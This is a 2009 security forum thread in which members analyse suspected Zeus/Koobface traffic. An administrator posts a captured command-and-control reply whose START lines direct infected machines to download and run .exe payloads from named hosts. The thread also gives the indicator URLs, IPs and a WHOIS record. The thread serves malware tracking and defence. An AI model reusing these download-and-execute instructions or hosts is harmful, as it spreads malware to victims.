Author Topic: New Zeus?  (Read 3468 times)

0 Members and 1 Guest are viewing this topic.

July 08, 2009, 09:45:26 pm
Read 3468 times

cmg

  • Jr. Member

  • Offline
  • **

  • 21
 98.143.159.138:80 POST http://trisem.com/achcheck.php 
 98.143.159.138:80 POST http://trisem.com/ld/gen.php 

I can't get to ZeusTracker right now but I think this is another one.

July 08, 2009, 10:12:34 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
gen.php;

Code: [Select]
#noparam
#PID=6145
START|http://upload.octopus-multimedia.be/1/6244.exe
START|http://upload.octopus-multimedia.be/1/nfr.exe
STARTONCE|http://upload.octopus-multimedia.be/1/pp.10.exe
WAIT|60
#BLACKLABEL
EXIT

upload.octopus-multimedia.be = 87.236.216.149 <> byte.besite.be

http://hosts-file.net/?s=87.236.216.149

achcheck.php;

Code: [Select]
ACH_OK
Code: [Select]
inetnum: 87.236.216.0 - 87.236.216.255
netname: BESITE-NET1-BRU-BE
mnt-domains: BESITE-MNT
descr: besite256
country: BE
admin-c: TDW7-RIPE
tech-c: TDW7-RIPE
status: ASSIGNED PA
mnt-by: BESITE-MNT
source: RIPE # Filtered

person: Tom De Wispelaere
address: Fonteinstraat 1 a bus 5
address: B- 3000 Leuven
address: BE
phone: +003216270005
fax-no: +003216270001
e-mail: tom@besite.be
nic-hdl: TDW7-RIPE
source: RIPE # Filtered

% Information related to '87.236.216.0/24AS35746'

route: 87.236.216.0/24
descr: besite256r
origin: AS35746
mnt-by: BESITE-MNT
source: RIPE # Filtered
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 08, 2009, 10:18:56 pm
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 08, 2009, 11:37:53 pm
Reply #3

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
the reply from gen.php says its definitely koobface